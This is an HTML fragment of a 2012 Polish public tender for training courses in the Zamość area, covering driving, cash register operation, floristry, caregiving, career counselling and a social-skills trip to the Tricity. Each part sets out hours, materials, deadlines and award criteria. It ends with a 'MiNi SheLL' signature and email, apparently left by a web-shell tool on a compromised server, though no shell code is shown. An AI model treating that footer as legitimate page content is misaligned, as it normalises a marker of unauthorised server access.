zakresie BHP i p. poż. Sale szkoleniowe muszą być oznakowane logotypami. Wykonawca szkolenie praktyczne
dla każdego uczestnika skierowanego przez Zamawiającego zrealizuje na pojeździe samochodowym marki, na którym będzie realizowany egzamin państwowy na prawo jazdy kategorii B. Szkolenia Wykonawca zrealizuje na
zasadach i w miejscach określonych w Rozporządzeniu Ministra Infrastruktury z dnia 27 października 2005 r. w
sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i
egzaminatorów (Dz. U. z 2005 r., Nr 217, poz. 1834 z późn. zm.) oraz Rozporządzeniu Ministra Infrastruktury z
dnia 8 maja 2009 r. zmieniającym rozporządzenie w sprawie szkolenia, egzaminowania i uzyskiwania
uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów (Dz. U. z 2009 r. Nr 78, poz. 653).
Wykonawca zapewnia także: materiały szkoleniowe oznakowane logotypami (w tym: podręcznik kierowcy, płytę
CD z komputerową bazą danych pytań, testy z pytaniami egzaminacyjnymi, materiały biurowe i piśmiennicze);
ubezpieczenie na okres kursu oraz w drodze na szkolenie, a także na powrót do miejsca zamieszkania; badania
lekarskie i psychologiczne, samochody do nauki jazdy sprawne technicznie i spełniające wymogi prawem
przewidziane w tym w zakresie BHP i p.poż.; egzamin wewnętrzny i wydanie zaświadczenia o ukończeniu
szkolenia, zgłoszenie i opłatę za egzamin państwowy w Wojewódzkim Ośrodku Ruchu Drogowego w Zamościu;
Zajęcia szkolenia w ramach kursu zrealizuje wykwalifikowana kadra Wykonawcy, która posiada odpowiednie
kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia. W przypadku
zlecenia organizacji i realizacji kursu, Wykonawca będzie prowadził dokumentację szkolenia tj. imienne listy
obecności z każdego dnia szkolenia, dziennik zajęć, imienne listy odbioru materiałów szkoleniowych, protokoły
z egzaminów. Potwierdzone za zgodność z oryginałem kserokopie dokumentów kursu, kserokopie dokumentów
potwierdzających uzyskanie pozytywnych wyników z egzaminu wewnętrznego oraz zdjęcia - fotografie z
przeprowadzonego kursu w ilości minimum 40 zdjęć na płycie CD, Wykonawca przekaże Zamawiającemu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> zadanie 4 - kurs obsługa kasy fiskalnej z fakturowaniem dla 3 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 4 kurs obsługa kasy fiskalnej z
fakturowaniem - organizację i przeprowadzanie usługi szkoleniowej obsługa kasy fiskalnej z fakturowaniem dla
3 osób, Ilość godzin szkolenia musi wynosić 120 godzin lekcyjnych Ilość godzin szkolenia: teoretycznego - 40
godzin lekcyjnych, szkolenia praktycznego - 80 godzin lekcyjnych Dzienny wymiar zajęć nie powinien
przekroczyć 8 godzin lekcyjnych, wymagamy, aby po każdych 2 godzinach lekcyjnych zajęć edukacyjnych
przewidziana była przerwa 15-to minutowa. Zajęcia muszą odbyć się od poniedziałku do piątku w dni robocze
w godzinach od 8:00 do 18:00 (8 godzin lekcyjnych dziennie), a po uzyskaniu zgody uczestnika kursu, także w
dni wolne od pracy. Przerwy między zajęciami nie pomniejszają wymaganego wymiaru godzin zajęć
edukacyjnych w ciągu dnia, tj. 8 godzin lekcyjnych dziennie. Szkolenie musi zakończyć się egzaminem
wewnętrznym. Miejsce realizacji szkolenia teoretycznego - pomieszczenia jednostki szkoleniowej. Miejsce
szkolenia praktycznego zapewnia Wykonawca. W uzgodnieniu z uczestnikiem projektu dopuszcza się możliwość
odbywania zajęć praktycznych poza Miastem Zamość. W takim przypadku Wykonawca zapewnia transport
uczestnika do miejsca odbywania praktycznej nauki zawodu i powrót do Miasta Zamość. Zajęcia praktyczne
muszą odbyć się na terenie powiatu zamojskiego. Każdy uczestnik szkolenia winien otrzymać na własność
materiały dydaktyczne niezbędne do realizacji szkolenia: materiały szkoleniowe w formie papierowej, notes,
długopis, ołówek. Materiały dydaktyczne muszą być nowe i oznakowane logotypami. Warunki lokalowe, sale
szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt muszą spełniać wymogi
prawne w zakresie BHP i p. poż. Sale szkoleniowe muszą być oznakowane logotypami. Zajęcia szkolenia
teoretycznego i praktycznego w ramach kursu zrealizują nauczyciele Wykonawcy, którzy posiadają odpowiednie
kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia. Wykonawca
zapewnia także: podstawowe narzędzia pracy, materiały niezbędne do realizacji zajęć, materiały szkoleniowe
(w tym materiały biurowe i piśmiennicze), ubezpieczenie na okres kursu, egzamin wewnętrzny i wydanie
zaświadczenia o ukończeniu szkolenia. Osoby, które ukończą szkolenie z wynikiem pozytywnym muszą
otrzymać zaświadczenie o ukończeniu kursu zawodowego (zgodnie z rozporządzeniem Ministra Edukacji i Nauki
z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności
i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006r. nr 31 poz. 216 z późn. zm.). W przypadku
zlecenia organizacji i realizacji kursu, Wykonawca będzie prowadził dokumentację szkolenia tj. imienne listy
obecności z każdego dnia szkolenia, dziennik zajęć, imienne listy odbioru materiałów szkoleniowych, protokoły
z egzaminów. Potwierdzone za zgodność z oryginałem kserokopie dokumentów kursu, kserokopie zaświadczeń
o ukończeniu kursu zawodowego oraz zdjęcia - fotografie z przeprowadzonego kursu w ilości minimum 30 zdjęć
na płycie CD, Wykonawca przekaże Zamawiającemu. Kurs obsługa kasy fiskalnej z fakturowaniem, w
przypadku zlecenia jego organizacji i realizacji, Wykonawca zrealizuje w oparciu o program szkolenia
spełniający zasady i warunki podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego osób dorosłych, a
także spełniający określone dla tych zawodów standardy kwalifikacji i szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> zadanie 5 - kurs bukieciarstwo i aranżacje roślinne dla 2 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 5 kurs bukieciarstwo i
aranżacje roślinne - organizację i przeprowadzanie usługi szkoleniowej z zakresu bukieciarstwo i aranżacje
roślinne dla 2 osób, Ilość godzin szkolenia musi wynosić 120 godzin lekcyjnych Ilość godzin szkolenia:
teoretycznego - 30 godzin lekcyjnych, szkolenia praktycznego - 90 godzin lekcyjnych Dzienny wymiar zajęć nie
powinien przekroczyć 8 godzin lekcyjnych, wymagamy, aby po każdych 2 godzinach lekcyjnych zajęć
edukacyjnych przewidziana była przerwa 15-to minutowa. Zajęcia muszą odbyć się od poniedziałku do piątku w
dni robocze w godzinach od 8:00 do 18:00 (8 godzin lekcyjnych dziennie), a po uzyskaniu zgody uczestnika
kursu, także w dni wolne od pracy. Przerwy między zajęciami nie pomniejszają wymaganego wymiaru godzin
zajęć edukacyjnych w ciągu dnia, tj. 8 godzin lekcyjnych dziennie. Szkolenie musi zakończyć się egzaminem
wewnętrznym. Miejsce realizacji szkolenia teoretycznego - pomieszczenia jednostki szkoleniowej. Miejsce
szkolenia praktycznego zapewnia Wykonawca. W uzgodnieniu z uczestnikiem projektu dopuszcza się możliwość
odbywania zajęć praktycznych poza Miastem Zamość. W takim przypadku Wykonawca zapewnia transport
uczestnika do miejsca odbywania praktycznej nauki zawodu i powrót do Miasta Zamość. Zajęcia praktyczne
muszą odbyć się na terenie powiatu zamojskiego. Każdy uczestnik szkolenia winien otrzymać na własność
materiały dydaktyczne niezbędne do realizacji szkolenia: materiały szkoleniowe w formie papierowej, długopis, ołówek. Materiały dydaktyczne muszą być nowe i oznakowane logotypami. Warunki lokalowe, sale szkoleniowe,
także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt muszą spełniać wymogi prawne w
zakresie BHP i p. poż. Sale szkoleniowe muszą być oznakowane logotypami. Zajęcia szkolenia teoretycznego i
praktycznego w ramach kursu zrealizują nauczyciele Wykonawcy, którzy posiadają odpowiednie kwalifikacje
zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia. Wykonawca zapewnia także:
ubranie robocze, podstawowe narzędzia pracy, materiały niezbędne do realizacji zajęć, materiały szkoleniowe
(w tym materiały biurowe i piśmiennicze), ubezpieczenie na okres kursu, egzamin wewnętrzny i wydanie
zaświadczenia o ukończeniu szkolenia. Osoby, które ukończą szkolenie z wynikiem pozytywnym muszą
otrzymać zaświadczenie o ukończeniu kursu zawodowego (zgodnie z rozporządzeniem Ministra Edukacji i
Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej,
umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006r. nr 31 poz. 216 z późn. zm.).
W przypadku zlecenia organizacji i realizacji kursu, Wykonawca będzie prowadził dokumentację szkolenia tj.
imienne listy obecności z każdego dnia szkolenia, dziennik zajęć, imienne listy odbioru materiałów
szkoleniowych, protokoły z egzaminów. Potwierdzone za zgodność z oryginałem kserokopie dokumentów kursu,
kserokopie zaświadczeń o ukończeniu kursu zawodowego oraz zdjęcia - fotografie z przeprowadzonego kursu w
ilości minimum 30 zdjęć na płycie CD, Wykonawca przekaże Zamawiającemu. Kurs bukieciarstwo i aranżacje
roślinne, w przypadku zlecenia jego organizacji i realizacji, Wykonawca zrealizuje w oparciu o program
szkolenia spełniający zasady i warunki podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego osób
dorosłych, a także spełniający określone dla tych zawodów standardy kwalifikacji i szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> zadanie 6 - kurs opiekun osoby chorej i niepełnosprawnej dla 2 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 6 - - organizację i
przeprowadzanie usługi szkoleniowej pod nazwą opiekun osoby chorej i niepełnosprawnej dla 2 osoby, Ilość
godzin szkolenia musi wynosić 100 godzin lekcyjnych. Ilość godzin szkolenia: teoretycznego - 30 godzin
lekcyjnych, szkolenia praktycznego - 70 godzin lekcyjnych Dzienny wymiar zajęć nie powinien przekroczyć 8
godzin lekcyjnych, wymagamy, aby po każdych 2 godzinach lekcyjnych zajęć edukacyjnych przewidziana była
przerwa 15-to minutowa. Zajęcia muszą odbyć się od poniedziałku do piątku w dni robocze w godzinach od
8:00 do 18:00 (8 godzin lekcyjnych dziennie), a po uzyskaniu zgody uczestnika kursu, także w dni wolne od
pracy. Przerwy między zajęciami nie pomniejszają wymaganego wymiaru godzin zajęć edukacyjnych w ciągu
dnia, tj. 8 godzin lekcyjnych dziennie. Szkolenie musi zakończyć się egzaminem wewnętrznym. Miejsce
realizacji szkolenia teoretycznego - pomieszczenia jednostki szkoleniowej na terenie powiatu zamojskiego.
Miejsce szkolenia praktycznego zapewnia Wykonawca. W uzgodnieniu z uczestnikiem projektu dopuszcza się
możliwość odbywania zajęć poza Miastem Zamość. W takim przypadku Wykonawca zapewnia transport
uczestnika do miejsca odbywania praktycznej nauki zawodu i powrót do Miasta Zamość. Każdy uczestnik
szkolenia powinien otrzymać na własność materiały dydaktyczne niezbędne do realizacji szkolenia: materiały
szkoleniowe w formie papierowej, notes, długopis, ołówek. Materiały dydaktyczne muszą być nowe i oznakowane logotypami. Warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz
wykorzystywany sprzęt muszą spełniać wymogi prawne w zakresie BHP i p. poż. Sale szkoleniowe muszą być
oznakowane logotypami. Zajęcia szkolenia teoretycznego i praktycznego w ramach kursu zrealizują nauczyciele
Wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do
wykonania zamówienia. Wykonawca zapewnia także: podstawowe narzędzia pracy, materiały niezbędne do
realizacji zajęć, materiały szkoleniowe (w tym materiały biurowe i piśmiennicze), ubezpieczenie na okres kursu,
egzamin wewnętrzny i wydanie zaświadczenia o ukończeniu szkolenia. Osoby, które ukończą szkolenie z
wynikiem pozytywnym muszą otrzymać zaświadczenie o ukończeniu kursu zawodowego (zgodnie z
rozporządzeniem Ministra Edukacji i Nauki z dnia 3 lutego 2006 r. w sprawie uzyskiwania i uzupełnienia przez
osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z
2006r. nr 31 poz. 216 z późn. zm.). W przypadku zlecenia organizacji i realizacji kursu, Wykonawca będzie
prowadził dokumentację szkolenia tj. imienne listy obecności z każdego dnia szkolenia, dziennik zajęć, imienne
listy odbioru materiałów szkoleniowych, protokoły z egzaminów. Potwierdzone za zgodność z oryginałem
kserokopie dokumentów kursu, kserokopie zaświadczeń o ukończeniu kursu oraz zdjęcia - fotografie z
przeprowadzonego kursu w ilości minimum 30 zdjęć na płycie CD, Wykonawca przekaże Zamawiającemu. Kurs
opiekun osoby chorej i niepełnosprawnej, w przypadku zlecenia jego organizacji i realizacji, Wykonawca
zrealizuje w oparciu o program szkolenia spełniający zasady i warunki podnoszenia kwalifikacji zawodowych i
wykształcenia ogólnego osób dorosłych, a także spełniający określone dla tych zawodów standardy kwalifikacji i
szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> zadanie 7 - szkolenie grupowe i indywidualne z zakresu doradztwa zawodowego dla 16 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 7 szkolenie z zakresu
doradztwa zawodowego - organizację i przeprowadzanie szkolenia z zakresu doradztwa zawodowego dla 16
osób, Ilość godzin szkolenia musi wynosić łącznie 40 godzin lekcyjnych, w tym 8 godzin szkolenia grupowego i
32 godziny szkolenia indywidualnego, średnio po 2 godziny dla każdego z 16 beneficjentów. Dzienny wymiar
nie powinien przekroczyć 6 godzin lekcyjnych dla uczestnika szkolenia. Miejsce realizacji szkolenia - Gminny
Ośrodek Pomocy Społecznej - pomieszczenia jednostki Gminnego Ośrodka Pomocy Społecznej. Zajęcia w
ramach szkolenia zrealizują nauczyciele Wykonawcy, którzy posiadają odpowiednie kwalifikacje zawodowe,
doświadczenie i wykształcenie niezbędne do wykonania zamówienia. Osoba prowadząca musi wydać
zaświadczenia o odbyciu szkolenia. W przypadku zlecenia organizacji i realizacji szkolenia, Wykonawca będzie
prowadził dokumentację zajęć tj. listy obecności z każdego dnia szkolenia. Potwierdzone za zgodność z
oryginałem kserokopie dokumentów szkolenia, kserokopie zaświadczeń o ukończeniu szkolenia, kserokopie
napisanych CV i listów motywacyjnych oraz zdjęcia - fotografie z przeprowadzonego szkolenia w ilości
minimum 30 zdjęć na płycie CD, ankiety wypełnione przez wszystkich uczestników szkolenia Wykonawca
przekaże Zamawiającemu. Szkolenia z zakresu doradztwa zawodowego, w przypadku zlecenia ich organizacji i realizacji, Wykonawca zrealizuje z uwzględnieniem następujących zagadnień: komunikacja jako istotne
narzędzie w funkcjonowaniu jednostki, poznanie samego siebie, rynek pracy, dokumenty aplikacyjne, rozmowa
kwalifikacyjna, indywidualny plan działania itp.). Wykonawca ma obowiązek przeprowadzenia wśród
uczestników szkolenia 2 ankiet: ankiety wstępnej przeprowadzonej przed rozpoczęciem działań dydaktycznych
(na początku szkolenia) - dotyczącej poziomu posiadanych przez uczestników szkolenia umiejętności i wiedzy z
zakresu poruszania się po rynku pracy, oraz ankiety końcowej, przeprowadzonej na zakończenie szkolenia -
dotyczącej poziomu nabycia nowych umiejętności poruszania się po rynku pracy uczestników szkolenia w
wyniku przeprowadzonego szkolenia oraz ich przydatności w dalszej karierze zawodowej. Ankietę wstępną i
ankietę końcową Wykonawca opracuje i przedstawi do akceptacji Zamawiającemu w okresie 7 dni przed
rozpoczęciem szkolenia. Wykonawca ma także obowiązek przeprowadzenia indywidualnie dla każdego
beneficjenta Diagnozy uczestnika która ma określać: a) profil zainteresowań uczestnika, b) preferowane
warunki pracy, c) propozycje zawodów. Opracowaną indywidualnie dla każdego beneficjenta Diagnozę
uczestnika w formie pisemnej po zakończonym szkoleniu w ciągu 7 dni Wykonawca przekaże Zamawiającemu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> zadanie 8 - Trening kompetencji i umiejętności społecznych w formie szkolenia
wyjazdowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 8 Trening kompetencji i
umiejętności społecznych w formie szkolenia wyjazdowego do miejscowości w Trójmieście w odległości od 600
km do 700 km od siedziby Zamawiającego dla 16 uczestników projektu, 1 koordynatora oraz 3 pracowników
socjalnych którzy będą prowadzili indywidualne warsztaty z osobami z którymi został zawarty kontrakt
socjalny. (Odległość w przedziale od 600 km do 700 km wg wskazań map samochodowych. Droga, którą można
dojechać do danego obiektu winna być drogą optymalną po trasie). Wykonawca musi przeprowadzić 28 godzin
szkolenia teoretycznego. Szkolenie powinno odbyć się w jednym z terminów: I termin w dniach 24.09.2012 r. -
28.09.2012 r., lub II termin w dniach 22.10.2012 r. - 26.10.2012 r. Zamawiający wybierze termin (w
zależności od możliwości uczestników szkolenia) i powiadomi Wykonawcę o wybranym terminie na 14 dni przed
planowanym szkoleniem. Zamawiający zastrzega możliwość przeprowadzania szkolenia w innym niż podanym
wyżej terminie uzgodnionym z Wykonawcą, jednak nie później niż 14 dni przed planowanym szkoleniem.
Wykonawca musi zapewnić wszystkim uczestnikom: dojazd od miejscowości Łabunie do miejsca szkolenia oraz
powrót z miejsca szkolenia do miejscowości Łabunie pojazdem przeznaczonym do przewozu minimum 20 osób
+ kierowca. Pojazd powinien być sprawny technicznie, mieć aktualne badania techniczne oraz powinien być
wyposażony w klimatyzację; 4 noclegi w hotelu lub pensjonacie o standardzie 3 gwiazdkowym lub o podobnym
poziomie (pokoje 2-3 - osobowe z łazienkami wyposażonymi w ręczniki i środki czystości oraz ciepłą wodę.
Temperatura w pokojach nie niższa niż 20 stopni Celsjusza) dla 20 osób; serwis kawowy i pełne wyżywienie
(śniadanie, obiad składający się z dwóch dań i deseru z możliwością wyboru dania wegetariańskiego, kolacja
oraz napoje) dla 16 beneficjentów, ,3 pracowników socjalnych i 1 koordynatora (w sumie dla 20 osób);
dodatkowe działania integracyjno - kulturalne (20 osób); jak również ubezpieczenie wszystkich uczestników (20 osób). Wykonawca musi zapewnić wykwalifikowanego trenera - wykładowcę szkolenia. Program szkolenia
wyjazdowego: I dnia: wyjazd o godzinie 1.00 (w nocy) zakwaterowanie, obiad, 5 godzin szkolenia, kolacja II
dzień: śniadanie, 6 godzin szkolenia, obiad, dodatkowe działania integracyjno - kulturalne: zwiedzanie
miejscowości nadmorskiej i okolicy wraz z przewodnikiem, uroczysta kolacja integracyjna, potańcówka. III
dzień: śniadanie, 6 godzin szkolenia, obiad, dodatkowe działania integracyjno - kulturalne: zwiedzanie
oceanarium, muzeum kolacja integracyjna z karaoke. IV dzień: śniadanie 6 godzin szkolenia obiad dodatkowe
działania integracyjno-kulturalne: teatr lub kino, zwiedzanie portu morskiego, kolacja integracyjna V dzień:
śniadanie 5 godzin szkolenia obiad wykwaterowanie, wyjazd (wykonawca zapewnia suchy prowiant
uczestnikom na drogę powrotną - napój 1.5 litra oraz po 4 kanapki - dwie bułeczki z wędliną, pomidor, sałata,
papryka, oraz dwie bułeczki z serem żółtym sałatą, papryka, pomidor). Wykonawca przeprowadzi na początku i
na końcu szkolenia ankietę dotyczącą podwyższenia samooceny przez beneficjentów. Wykonawca ma
obowiązek przeprowadzenia wśród uczestników szkolenia 2 ankiet: ankiety wstępnej przeprowadzonej przed
rozpoczęciem działań dydaktycznych (na początku szkolenia) - dotyczącej poziomu samooceny uczestników
szkolenia, oraz ankiety końcowej, przeprowadzonej na zakończenie szkolenia - dotyczącej podwyższenia
samooceny uczestników szkolenia w wyniku przeprowadzonego szkolenia. Ankietę wstępną i ankietę końcową
Wykonawca opracuje i przedstawi do akceptacji Zamawiającemu w okresie 7 dni przed rozpoczęciem szkolenia.
W przypadku zlecenia organizacji i realizacji kursu, Wykonawca będzie prowadził dokumentację szkolenia tj.
imienne listy obecności z każdego dnia szkolenia, dziennik zajęć. Potwierdzone za zgodność z oryginałem
kserokopie dokumentów kursu, kserokopie zaświadczeń o ukończeniu kursu oraz zdjęcia - fotografie z
przeprowadzonego kursu w ilości minimum 40 zdjęć na płycie CD, ankiety wypełnione przez wszystkich
uczestników szkolenia Wykonawca przekaże Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 55.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 26.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com